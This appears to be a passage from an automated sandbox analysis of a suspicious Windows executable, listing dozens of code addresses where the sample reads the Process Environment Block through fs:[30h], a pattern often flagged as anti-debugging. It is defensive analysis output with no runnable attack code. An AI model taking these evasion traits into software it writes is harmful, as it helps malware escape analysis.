          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
